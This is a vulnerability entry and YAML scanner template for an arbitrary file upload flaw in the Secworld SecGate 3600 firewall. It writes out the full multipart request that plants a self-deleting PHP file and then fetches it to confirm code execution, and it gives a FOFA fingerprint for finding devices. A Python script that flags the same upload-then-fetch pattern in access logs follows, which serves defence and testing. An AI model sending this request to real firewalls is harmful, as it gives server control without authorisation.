Vulnerability description
The obj_app_upfile interface of the 网神 (Secworld) SecGate 3600 firewall has an arbitrary file upload vulnerability; an attacker who crafts a specially constructed request can obtain control of the server.
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
id: secworld-secgate3600-objappupfile-uploadfile

info:
  name: 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限
    FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
  tags: secworld,uploadfile
  created: 2023/08/09

set:
  r1: randomLowercase(4)
  r2: randomInt(40000, 44800)
  r3: randomInt(40000, 44800)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /?g=obj_app_upfile
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\
        \r\n\
        10000000\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"upfile\"; filename=\"{{r1}}.php\"\r\n\
        Content-Type: text/plain\r\n\
        \r\n\
        <?php echo {{r2}}*{{r3}};unlink(__FILE__);?>\r\n\
        \r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"submit_post\"\r\n\
        \r\n\
        obj_app_upfile\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"__hash__\"\r\n\
        \r\n\
        0b9d6b1ab7479ab69d9f71b05e0e9445\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 302
  r1:
    request:
      method: GET
      path: /attachements/{{r1}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()
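A log-side detection for the upload-then-fetch pattern the template exercises, as an added example that is not part of the original template or the vendor's code: it scans constructed combined-format access log lines for POSTs to the obj_app_upfile handler and for PHP files requested under /attachements/ (the path the template fetches), escalating severity when both come from the same client. The log format and the assumption that no legitimate file under /attachements/ should end in .php are mine.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Aug/2023:10:01:02 +0800] "POST /?g=obj_app_upfile HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Aug/2023:10:01:03 +0800] "GET /attachements/abcd.php HTTP/1.1" 200 10 "-" "Mozilla/5.0"
198.51.100.4 - - [09/Aug/2023:10:05:00 +0800] "GET /?g=obj_app_upfile HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.4 - - [09/Aug/2023:10:05:30 +0800] "POST /?g=obj_app_upfile HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [09/Aug/2023:10:07:00 +0800] "GET /attachements/report.pdf HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The upload handler is selected by the g= query parameter (from the template).
UPLOAD_PATH_RE = re.compile(r'[?&]g=obj_app_upfile(?:&|$)')
# Assumption: uploads land under /attachements/ and none should be PHP.
EXEC_UPLOAD_RE = re.compile(r'^/attachements/[^/?]+\.php$', re.IGNORECASE)


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect(log_text):
    """Return alerts as (severity, client_ip, reason) tuples, in log order."""
    alerts = []
    uploads = defaultdict(int)  # client_ip -> POSTs seen to the upload handler
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        if method == "POST" and UPLOAD_PATH_RE.search(path):
            uploads[ip] += 1  # a 302 here is what the template treats as success
            alerts.append(("medium", ip, f"POST to obj_app_upfile (status {status})"))
        elif method == "GET" and EXEC_UPLOAD_RE.match(path.split("?")[0]):
            # PHP under the upload directory after an upload from the same client.
            sev = "critical" if uploads[ip] else "high"
            alerts.append((sev, ip, f"PHP requested under /attachements/: {path} (status {status})"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```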